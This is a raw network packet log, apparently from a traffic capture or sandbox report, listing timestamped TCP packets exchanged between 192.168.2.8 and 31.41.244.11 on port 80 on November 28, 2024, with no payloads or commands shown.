                                                  Nov 28, 2024 13:12:12.737582922 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.737631083 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.737710953 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.737755060 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.738475084 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.738524914 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.738569021 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.738615036 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.739434004 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.739480972 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.739526987 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.739568949 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.740411043 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.740458965 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.740510941 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.740551949 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.741385937 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.741432905 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.741487026 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.741532087 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.742352009 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.742397070 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.742469072 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.742516994 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.743360996 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.743403912 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.743417025 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.743458033 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.744297028 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.744343042 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.744388103 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.744432926 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.745270014 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.745318890 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.745363951 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.745405912 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.746237040 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.746283054 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.746320009 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.746364117 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.747209072 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.747252941 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.747323990 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.747370005 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.748167992 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.748214960 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.748301029 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.748343945 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.749165058 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.749212980 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.749300003 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.749349117 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.750149965 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.750211954 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.750248909 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.750305891 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.751111031 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.751159906 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.751199007 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.751245975 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.752079010 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.752127886 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.752315044 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.752367020 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.753074884 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.753123999 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.753190041 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.753237963 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.754036903 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.754086971 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.754092932 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.754137039 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.754992962 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.755054951 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.755151033 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.755193949 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.755948067 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.755996943 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.756055117 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.756103992 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.756961107 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.757010937 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.757049084 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.757107973 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.757913113 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.757963896 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.758009911 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.758058071 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.758898020 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.758946896 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.758991003 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.759036064 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.759908915 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.759960890 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.759990931 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.760039091 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.760858059 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.760910034 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.761149883 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.761198044 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.761823893 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.761876106 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.761914968 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.761960030 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.762780905 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.762829065 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.762909889 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.762958050 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.763765097 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.763816118 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.763861895 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.763911009 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.764725924 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.764780998 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.764868021 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.764920950 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.765727997 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.765777111 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.765803099 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.765855074 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.766663074 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.766712904 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.766751051 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.766799927 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.773442030 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.773498058 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.773610115 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.773657084 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.773936033 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.773981094 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.773983002 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.774025917 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.774907112 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.774955988 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.775033951 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.775082111 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.776119947 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.776175022 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.776182890 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.776223898 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.776859045 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.776909113 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.776953936 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.777002096 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.777848005 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.777904034 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.777904987 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.777951002 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.778794050 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.778844118 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.778903008 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.778949022 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.779757977 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.779803991 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.779875040 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.779920101 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.780750990 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.780797005 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.780828953 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.780879021 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.781739950 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.781783104 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.781805992 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.781850100 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.782700062 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.782747030 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.782816887 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.782864094 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.783667088 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.783714056 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.783783913 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.783828974 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.784632921 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.784677982 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.784739971 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.784785032 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.785557032 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.785603046 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.930537939 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.930562973 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.930589914 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.930613041 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.930962086 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.931004047 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.931052923 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.931091070 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.931916952 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.931967020 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.931981087 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.932017088 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.932924032 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.932971001 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.933038950 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.933079004 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.933957100 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.934003115 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.934063911 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.934101105 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.934837103 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.934943914 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.934950113 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.934988022 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.935811043 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.935853958 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.935894012 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.935933113 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.936779976 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.936836004 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.936887026 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.936929941 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.937820911 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.937866926 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.937930107 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.937975883 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.938724995 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.938771963 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.938940048 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.938987970 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.940278053 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.940319061 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.940352917 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.940398932 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.940910101 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.940957069 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.941015959 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.941052914 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.941667080 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.941709995 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.941740036 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.941782951 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.942634106 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.942679882 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.942768097 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.942821026 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.943568945 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.943619013 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.943695068 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.943739891 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.944556952 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.944603920 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.944756031 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.944804907 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.945540905 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.945586920 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.945735931 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.945780993 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.946583033 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.946636915 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.946659088 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.946701050 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.947459936 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.947506905 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.947515011 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.947556973 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.948457956 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.948501110 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.948524952 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.948565960 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.949454069 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.949498892 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.949536085 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.949577093 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.950381041 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.950433969 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.950501919 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.950541973 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.951395035 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.951442003 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.951452017 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.951493025 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.952362061 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.952406883 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.952578068 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.952620983 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.953366995 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.953409910 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.953430891 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.953475952 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.954289913 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.954336882 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.954402924 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.954448938 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.955359936 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.955370903 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.955405951 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.955420971 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.956451893 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.956499100 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.956566095 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.956609964 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.957245111 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.957290888 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.957395077 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.957442999 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.958197117 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.958242893 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.958307981 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.958350897 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.959122896 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.959168911 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.959239006 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.959281921 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.960099936 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.960144043 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.960180044 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.960222006 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.961102962 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.961146116 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.961256981 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.961307049 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.962174892 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.962220907 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.962250948 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.962294102 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.963078976 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.963123083 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.963193893 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.963237047 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.964055061 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.964098930 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.964123964 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.964163065 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.965080023 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.965137005 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.965181112 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.966121912 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.966166019 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.966269970 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.966315985 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.967084885 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.967133045 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.967155933 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.967196941 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.968080997 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.968127012 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.968159914 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.968204021 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.974455118 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.974555016 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.974608898 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.974917889 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.974966049 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.975040913 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.975087881 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.975902081 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.975945950 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:12.976032019 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:12.976073027 CET4971680192.168.2.831.41.244.11
